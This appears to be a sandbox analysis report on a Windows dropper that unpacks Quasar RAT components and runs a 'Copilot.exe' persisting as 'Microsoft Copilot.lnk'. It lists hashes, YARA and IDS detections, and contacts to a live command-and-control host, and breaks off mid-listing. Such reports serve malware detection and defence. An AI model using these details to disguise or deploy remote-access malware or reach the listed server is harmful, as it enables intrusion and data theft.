                                                                                    SHA-256:7DA3F0E77C4DDDC82DF7C16C8C781FADE599B7C91E3D32EEFBCE215B8F06B12A
                                                                                    SHA-512:4C034FF51CC01567F3CB0796575528CA44623B864EB606266BCF955A9259ED26B20BEC0086D79038158D3A5AF2ADA0A90F59D7C6AAE9E545294FE77825DBE08B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..&...........D... ...`....... ....................................`..................................D..O....`...............................C..T............................................ ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc..............................@..B.................D......H..........................................................................c...(....(.....c...}......(.....{.....c...(....jXs....*...|....{....o......|....{....o......|....{....o.....(....&*..0..>........e...(.....|....{.....1...(......(....-..*.|....{.......( ...*2.|....{....*6.|.....}....*.r...p.(.....(.....4....|....{....(...+r...pr#..po!...("...*..(#...*..{....*"..}....*..s$...}.....~%...~%.....s.....(.....(....*n.s$...}..............(....*....0..C........{Q....c...(....

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\aa-DJ\Quasar.resources.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):177664
                                                                                    Entropy (8bit):7.499743289424205
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:xilDAVET7oenGBTdkl/xBSFq7mGpbcilDAVET7teNA:oSal7lOFqKGpbFSa
                                                                                    MD5:1C4E173F9D93CA70E8FA4E983AEC18D0
                                                                                    SHA1:C56B966ACF47447241342DE376D8639B3B142161
                                                                                    SHA-256:1BB7CA30AA772031E1071C384A267023FF783823F37467C0B13A8836858BE7D3
                                                                                    SHA-512:45B66311E8DB1E8899D70388394D08934AF049F59CE9E69849BDD7B01279F1631A3AB304A9C355B4486AAD73273C9158D65238DFE6E424722C61E437A6FE7CC8
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.g...........!................~.... ........... ....................... ............@.................................,...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H...........\...........P ..}...........................................y..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............fSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3ahSystem.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a.System.Windows.Forms.Image

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3290624
                                                                                    Entropy (8bit):5.997416065677387
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:snl7+y2FqZaVmN+PqlhU/mevlL1nY1sdeIfxUuxG2THHB72eh2NT:snp+y2FqZaVmN+PqlhU//vlL1Y1sQSx
                                                                                    MD5:1BF9DDE847E5C6953476C65B380FD510
                                                                                    SHA1:A7BE03A218DAE86518F0630133D518186E00FDAA
                                                                                    SHA-256:A19D139901151F58B3887A745A8268C21FD7EEFE5565630BCC7A8320319DAE6F
                                                                                    SHA-512:5CC2E08C22E972F8C0E603A32C5FB548B8C657B3EE2C8C6862CCF0C4A22FA531F9672BF5757C27723C69C44D1CCF84AA4D45B61DD3B440221760E7902CE79CB9
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, Author: Joe Security
                                                                                    • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, Author: Florian Roth
                                                                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, Author: ditekSHen
                                                                                    • Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, Author: ditekshen
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.g.................&2..........D2.. ........@.. ........................2...........@..................................C2.W....`2.......................2...................................................... ............... ..H............text....$2.. ...&2................. ..`.rsrc........`2......(2.............@..@.reloc........2......42.............@..B.................C2.....H........a..................p............................................0..M....... ....(.....(...........s....(....(...........s....o....(.....(....s....(....*....0..8.......(....(0....s....%.o....%.o....%.o....(....&..&...(.....*........--..........00.......0..@........o....,7(....(0....s....%.o....%.o....%.o....(....&..&...(.....*........-5..........08......f~w...,.~....(....(....*.*..v.(.....s....}.....s....}....*..r..(......(.....(......(....*....0..L........{....r...po

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\protobuf-net.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):289280
                                                                                    Entropy (8bit):6.509493607173111
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:yRAISQ1tRSVB3zpKTEPn6Rc0qus/6GMzzeSXLifsE2s58IB7aoqng5YnDBzs39AH:yRFD1niy6n6KwhO5mIYpnNzgGD0u
                                                                                    MD5:ABC82AE4F579A0BBFA2A93DB1486EB38
                                                                                    SHA1:FAA645B92E3DE7037C23E99DD2101EF3DA5756E5
                                                                                    SHA-256:CA6608346291EC82EE4ACF8017C90E72DB2EE7598015F695120C328D25319EC6
                                                                                    SHA-512:E06EE564FDD3FE2E26B0DEC744A969A94E4B63A2E37692A7DCC244CB7949B584D895E9D3766EA52C9FE72B7A31DACF4551F86EA0D7C987B80903FF43BE9FAED3
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....B..........." ..0..`..........j~... ........... ..............................s.....`..................................~..O...................................x...p............................................ ............... ..H............text...p^... ...`.................. ..`.rsrc................b..............@..@.reloc...............h..............@..B................K~......H..........,.............................................................(<...*..(<...*V!..k.@....s=........*..(>...*&...(....*.0..W........-.r...ps?...z.o|......;......Y.B......(@.....~A...(B...,..j....8.....~C...(B...,..j....8.....!..i*....]-....!..i*....[.+d.!.h.a....]-....!.h.a....[.+G. .F.#j]-.... .F.#j[.+0. ....j]-.... ....j[.+.. .'..j]-.... .'..j[.+.....(......,....(}.....(.....,....(}.....(.....,....(}.....(......(....*..(@....(....*r...p.o|.........3...oD...(E...s..

                                                                                    C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\settings.xml

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):373
                                                                                    Entropy (8bit):4.820847191105035
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:i+Ms7RbCGflVOkKsLVOC13/8Kk0odWKGJAZK2QjErKwgtyYKCR2AZK2TZw6r4JZI:i+hRxnOkKkO48Kwe2K2QjYKhyCbK2S+f
                                                                                    MD5:B6AF1DA05C1A00991F04F8B898CEA532
                                                                                    SHA1:24C48B062D8D864EEFD32F2D84A36E1A7282E911
                                                                                    SHA-256:F2EF0D8F29904A65CE6DBE29BAF9379FB4659AFB6930A5AF5D9FB88F73B73F41
                                                                                    SHA-512:2AB2DE469911C3FEE5B9BBFDBB373E5EB15023BF25B9E1835EBBF5890C66CFD7A06D7D5911E2FB630AFADF9B30489E589634CEFE52CA4C4156AE24B24C00C8AA
                                                                                    Malicious:false
                                                                                    Preview:<settings>.. <ListenPort>4782</ListenPort>.. <IPv6Support>False</IPv6Support>.. <AutoListen>False</AutoListen>.. <ShowPopup>False</ShowPopup>.. <UseUPnP>False</UseUPnP>.. <ShowToolTip>False</ShowToolTip>.. <EnableNoIPUpdater>False</EnableNoIPUpdater>.. <NoIPHost>.. </NoIPHost>.. <NoIPUsername>.. </NoIPUsername>.. <NoIPPassword>.. </NoIPPassword>..</settings>

                                                                                    C:\Users\user\AppData\Local\Temp\unarchiver.log

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\unarchiver.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):7334
                                                                                    Entropy (8bit):5.291629956664462
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:w3hYmtIReFG0m0r+0rn0rC0rP0r3q9KGqSfIJJ3p:w3w0P
                                                                                    MD5:B299AFFC161B46AF67CB2654206891D2
                                                                                    SHA1:10A1C74407496B0274FAB04B0C7372737F6CFBAA
                                                                                    SHA-256:1D1AE82F5EC1493F160E7338F697C543BC433C9B4B536EFCBED1046362A965EB
                                                                                    SHA-512:1B1368453F3FFF9DC76F12C1069F9B9ADB9EB31EA03CA0DCA25494E342537646E6AE1B0D34E6D39AA772806FF6AB9F209640C523A3E282CCD5A1454B96C11C8F
                                                                                    Malicious:false
                                                                                    Preview:10/06/2024 6:53 PM: Unpack: C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip..10/06/2024 6:53 PM: Tmp dir: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd..10/06/2024 6:53 PM: Received from standard out: ..10/06/2024 6:53 PM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..10/06/2024 6:53 PM: Received from standard out: ..10/06/2024 6:53 PM: Received from standard out: Scanning the drive for archives:..10/06/2024 6:53 PM: Received from standard out: 1 file, 6550613 bytes (6398 KiB)..10/06/2024 6:53 PM: Received from standard out: ..10/06/2024 6:53 PM: Received from standard out: Extracting archive: C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip..10/06/2024 6:53 PM: Received from standard out: --..10/06/2024 6:53 PM: Received from standard out: Path = C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip..10/06/2024 6:53 PM: Received from standard out: Type = zip..10/06/2024 6:53 PM: Received from standard out: Physical Size = 6550613

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Copilot.lnk

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\Copilot.exe
                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 6 23:35:09 2024, mtime=Sun Oct 6 23:35:09 2024, atime=Sun Oct 6 23:35:09 2024, length=71680, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):1108
                                                                                    Entropy (8bit):5.009701879687133
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:8CpHNC2qDRQgKa8X+SYVHAWdZCb0Ve77G4EUwqygm:8CpHNC2qDRgLqgWdZCbWe3XEmyg
                                                                                    MD5:67355DEDCEBA4B0E295A8F36FA46EACA
                                                                                    SHA1:BDCB02A1873E842484D933282E281B20D58E854F
                                                                                    SHA-256:48EFF580E4A0BDC10ACB5AC62C596B65913DE23A3E3BB6123D6DA3150099A5B9
                                                                                    SHA-512:7B11493563D0C099E5860313C0F93BBAC67B2F5446281D4868CA032C49FD3E3BEF78491C7EFC784E94AC77DF074171B8D6169375A90B32512AE4F9455999EDC8
                                                                                    Malicious:false
                                                                                    Preview:L..................F.... .......P.......P.......P.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....[F}B......P.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=GYO...........................3*N.A.p.p.D.a.t.a...B.P.1.....FY....Local.<......EW.=GYO...............................L.o.c.a.l.....N.1.....GYX...Temp..:......EW.=GYX...........................2.o.T.e.m.p.....x.2.....GYe. .MICROS~1.EXE..\......GYe.GYe......N....................a}N.M.i.c.r.o.s.o.f.t. .C.o.p.i.l.o.t...e.x.e.......j...............-.......i.............4......C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe..2.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.M.i.c.r.o.s.o.f.t. .C.o.p.i.l.o.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......301389...........hT..CrF.f4... ..{k.C....,......hT..CrF.f4... ..{k.C....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                    Entropy (8bit):7.999726717791036
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • VXD Driver (31/22) 0.00%
                                                                                    File name:PixpFUv4G7.exe
                                                                                    File size:6'669'824 bytes
                                                                                    MD5:75c7da1457f052ae8aa48571898d4094
                                                                                    SHA1:b851a0ba41ced091fd775b72c91b329d387cdeff
                                                                                    SHA256:066cffd2ba05642d4bcadf466fa00ba50210b6aed526c07382924c7aaece384e
                                                                                    SHA512:78279310fe36ba0f1d0b54ecc03f13b2094f207778bb07dfd56f88cba9a5e71cf589eb035e973fb533c161e70034fa4e0a6230e79a70bf18f30f79a327bfcdc8
                                                                                    SSDEEP:196608:ebykpmsXWNegK1D2+XUrsLrB9L8kIgCBtorLeeN5nMzl6:uyymcWZID2gNqkI/torLeeN5Mzl
                                                                                    TLSH:896633CA6363A994D7D9D4B8996120370CE8D28C10BFE422E77C3964D53C923E6ED8DD
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.............................e.....u........0e...@...........................e.......f....................................

                                                                                    File Icon

                                                                                    Icon Hash:c18686cccc8ef0cc

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x401475
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                    DLL Characteristics:
                                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:a9c887a4f18a3fede2cc29ceea138ed3

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 00000008h
                                                                                    nop
                                                                                    mov eax, 00000004h
                                                                                    push eax
                                                                                    mov eax, 00000000h
                                                                                    push eax
                                                                                    lea eax, dword ptr [ebp-04h]
                                                                                    push eax
                                                                                    call 00007F1940D138B1h
                                                                                    add esp, 0Ch
                                                                                    mov eax, 00401453h
                                                                                    push eax
                                                                                    call 00007F1940D138F3h
                                                                                    mov eax, 00000001h
                                                                                    push eax
                                                                                    call 00007F1940D138F0h
                                                                                    add esp, 04h
                                                                                    mov eax, 00030000h
                                                                                    push eax
                                                                                    mov eax, 00010000h
                                                                                    push eax
                                                                                    call 00007F1940D138E4h
                                                                                    add esp, 08h
                                                                                    mov eax, dword ptr [00A52D34h]
                                                                                    mov ecx, dword ptr [00A52D38h]
                                                                                    mov edx, dword ptr [00A52D3Ch]
                                                                                    mov dword ptr [ebp-08h], eax
                                                                                    lea eax, dword ptr [ebp-04h]
                                                                                    push eax
                                                                                    mov eax, dword ptr [00A53000h]
                                                                                    push eax
                                                                                    push edx
                                                                                    push ecx
                                                                                    mov eax, dword ptr [ebp-08h]
                                                                                    push eax
                                                                                    call 00007F1940D138BEh
                                                                                    add esp, 14h
                                                                                    mov eax, dword ptr [00A52D34h]
                                                                                    mov ecx, dword ptr [00A52D38h]
                                                                                    mov edx, dword ptr [00A52D3Ch]
                                                                                    mov dword ptr [ebp-08h], eax
                                                                                    mov eax, dword ptr [edx]
                                                                                    push eax
                                                                                    mov eax, dword ptr [ecx]
                                                                                    push eax
                                                                                    mov eax, dword ptr [ebp-08h]
                                                                                    mov eax, dword ptr [eax]
                                                                                    push eax
                                                                                    call 00007F1940D1369Ch
                                                                                    add esp, 0Ch
                                                                                    push eax
                                                                                    call 00007F1940D13894h
                                                                                    add esp, 04h
                                                                                    leave
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 00000004h
                                                                                    nop
                                                                                    mov eax, dword ptr [00A52D34h]
                                                                                    mov ecx, dword ptr [ebp+08h]
                                                                                    mov dword ptr [eax], ecx
                                                                                    mov eax, dword ptr [00000000h]

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x652cc00x50.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x6540000xa950.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x652d100x58.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x6080x8008b04f8cbdeb565deb627a3ffa8eabacfFalse0.38525390625data4.428287327715436IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x20000x650ec30x6510007cbd850aebc58b480e1ab008bc8236beunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .bss0x6530000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x6540000xa9500xaa00e0316afc28b254b69257ee161ecddd58False0.9827205882352941data7.965592124903254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0x6541000xa590PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960362400906002
                                                                                    RT_GROUP_ICON0x65e6900x14dataEnglishUnited States1.1
                                                                                    RT_MANIFEST0x65e6a80x2a5XML 1.0 document, ASCII textEnglishUnited States0.4756277695716396

                                                                                    Imports

                                                                                    DLLImport
                                                                                    msvcrt.dllmalloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                                                                    shell32.dllShellExecuteA
                                                                                    kernel32.dllSetUnhandledExceptionFilter

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-10-07T00:54:49.015016+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.749973147.185.221.2147900TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 7, 2024 00:53:12.094173908 CEST4969980192.168.2.7208.95.112.1
                                                                                    Oct 7, 2024 00:53:12.098937035 CEST8049699208.95.112.1192.168.2.7
                                                                                    Oct 7, 2024 00:53:12.098999023 CEST4969980192.168.2.7208.95.112.1
                                                                                    Oct 7, 2024 00:53:12.099562883 CEST4969980192.168.2.7208.95.112.1
                                                                                    Oct 7, 2024 00:53:12.104307890 CEST8049699208.95.112.1192.168.2.7
                                                                                    Oct 7, 2024 00:53:12.575023890 CEST8049699208.95.112.1192.168.2.7
                                                                                    Oct 7, 2024 00:53:12.623529911 CEST4969980192.168.2.7208.95.112.1
                                                                                    Oct 7, 2024 00:54:12.216790915 CEST4997147900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:12.223556042 CEST4790049971147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:54:12.223707914 CEST4997147900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:12.269644022 CEST4997147900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:12.276139021 CEST4790049971147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:54:26.720530987 CEST4997147900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:26.727863073 CEST4790049971147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:54:33.614598989 CEST4790049971147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:54:33.614741087 CEST4997147900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:34.155519009 CEST4997147900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:34.162681103 CEST4790049971147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:54:34.169868946 CEST4997347900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:34.177062988 CEST4790049973147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:54:34.177184105 CEST4997347900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:34.229667902 CEST4997347900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:34.236675978 CEST4790049973147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:54:49.015016079 CEST4997347900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:49.019804001 CEST4790049973147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:54:52.610183954 CEST4969980192.168.2.7208.95.112.1
                                                                                    Oct 7, 2024 00:54:52.618457079 CEST8049699208.95.112.1192.168.2.7
                                                                                    Oct 7, 2024 00:54:52.618583918 CEST4969980192.168.2.7208.95.112.1
                                                                                    Oct 7, 2024 00:54:55.549041033 CEST4790049973147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:54:55.549154043 CEST4997347900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:55.609005928 CEST4997347900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:55.615051031 CEST4790049973147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:54:55.615818024 CEST4997447900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:55.622077942 CEST4790049974147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:54:55.622200966 CEST4997447900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:55.662918091 CEST4997447900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:54:55.669372082 CEST4790049974147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:55:06.124178886 CEST4997447900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:55:06.130610943 CEST4790049974147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:55:15.281105042 CEST4997447900192.168.2.7147.185.221.21
                                                                                    Oct 7, 2024 00:55:15.285897017 CEST4790049974147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:55:17.002549887 CEST4790049974147.185.221.21192.168.2.7
                                                                                    Oct 7, 2024 00:55:17.002717018 CEST4997447900192.168.2.7147.185.221.21

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 7, 2024 00:53:12.080708027 CEST6138953192.168.2.71.1.1.1
                                                                                    Oct 7, 2024 00:53:12.087766886 CEST53613891.1.1.1192.168.2.7
                                                                                    Oct 7, 2024 00:54:12.192682981 CEST5877153192.168.2.71.1.1.1
                                                                                    Oct 7, 2024 00:54:12.211497068 CEST53587711.1.1.1192.168.2.7

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Oct 7, 2024 00:53:12.080708027 CEST192.168.2.71.1.1.10xb833Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                    Oct 7, 2024 00:54:12.192682981 CEST192.168.2.71.1.1.10x2b77Standard query (0)content-portion.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Oct 7, 2024 00:53:12.087766886 CEST1.1.1.1192.168.2.70xb833No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                    Oct 7, 2024 00:54:12.211497068 CEST1.1.1.1192.168.2.70x2b77No error (0)content-portion.gl.at.ply.gg147.185.221.21A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • ip-api.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.749699208.95.112.1806488C:\Users\user\AppData\Local\Temp\Copilot.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 7, 2024 00:53:12.099562883 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                    Host: ip-api.com
                                                                                    Connection: Keep-Alive
                                                                                    Oct 7, 2024 00:53:12.575023890 CEST175INHTTP/1.1 200 OK
                                                                                    Date: Sun, 06 Oct 2024 22:53:11 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 6
                                                                                    Access-Control-Allow-Origin: *
                                                                                    X-Ttl: 60
                                                                                    X-Rl: 44
                                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                                    Data Ascii: false


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:18:53:06
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Users\user\Desktop\PixpFUv4G7.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\PixpFUv4G7.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:6'669'824 bytes
                                                                                    MD5 hash:75C7DA1457F052AE8AA48571898D4094
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:18:53:07
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\Copilot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\Copilot.exe"
                                                                                    Imagebase:0x960000
                                                                                    File size:71'680 bytes
                                                                                    MD5 hash:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    Has elevated privileges:true
